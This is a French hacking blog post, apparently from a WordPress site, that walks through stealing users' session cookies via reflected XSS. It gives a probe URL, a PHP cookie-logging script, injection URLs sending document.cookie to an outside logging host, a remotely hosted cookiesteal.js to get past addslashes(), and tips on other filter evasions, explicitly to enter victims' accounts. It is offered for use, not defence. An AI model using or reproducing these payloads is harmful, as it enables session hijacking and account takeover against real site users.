Galerie

Vol de cookies par XSS

Bon je me remet à l’écriture, avec un petit tutoriel pratique =)

Première étape : trouver une vulnérabilité XSS

Si vous lisez ceci, c’est que vous savez déjà le fonctionnement d’une XSS.

Voici notre vulnérabilité XSS  :

Code :
http://www.site.com/search.php?query="><scblockedript>alert(123)</scblockedript>

Un message s’affichera disant « 123 » cela signifie que nous avons eu notre vulnérabilité lors du chargement de cette page.

Deuxième étape : mise en place d’un voleur de cookie

Nous utiliserons certainement PHP, Voici un exemple d’un voleur de cookie simple :

Code :
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "nn");
fclose($file);
?>

Vous pouvez utiliser votre propre code php ou utiliser un site web fait exprès du genre wspy.org Bref, soit vous l’uploadez sur votre ftp avec l’extension .php, soit vous avez déjà un site qui vous permet ‘avoir des stealer cookies sous forme de lien.

Troisième étape : enregistrement d’un cookie

Bon, on a notre XSS et notre stealer de cookies =)

Nous faisons une nouvelle injection (au lieu de l’alerte) qui envoie les données de cookie. Il pourrait ressembler à ceci :

Code :
http://www.site.com/search.php?query="><scblockedript>location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie;</scblockedript>

Si le site n’utilise pas addslashes() ou tous les autres filtres mess jusqu’à notre injection, nous avons réussi à capturer le cookie et à le sauvegarder sur notre compte. A partir de là, nous pouvons copier les cookies des utilisateurs (plus communément les sessions) à nos propres cookies et entrer dans leurs comptes…

Étape 4: filtrer évasion

Disons que nous avons rencontré le problème commun suivant : la page cible utilise addslashes() sur la variable GET avant impression, qui tue notre injection en détruisant nos citations. Pas de problème, on va contourner cela.

Enregistrez un nouveau compte sur un site d’hébergement gratuit (j’utilise le FreeWebs.com) et faîtes un nouveau fichier de scblockedript y. Construire un fichier appelé cookiesteal.js et lui donner le contenu suivant :

Code :
location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie;

Maintenant, nous appelons le scblockedript par le biais de la page vulnérable XSS :

Code :
http://www.site.com/search.php?query="><scblockedript src=http://www.freewebs.com/uber0n/cookiesteal.js>

Si vous rencontrez d’autres filtres qu’addslashes, essayez d’exécuter la scblockedripts par le biais d’IFRAME, images etc..

Enjoy !

Publicités
par 3ncrypt0r Posté dans Hacking

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion / Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion / Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion / Changer )

Photo Google+

Vous commentez à l'aide de votre compte Google+. Déconnexion / Changer )

Connexion à %s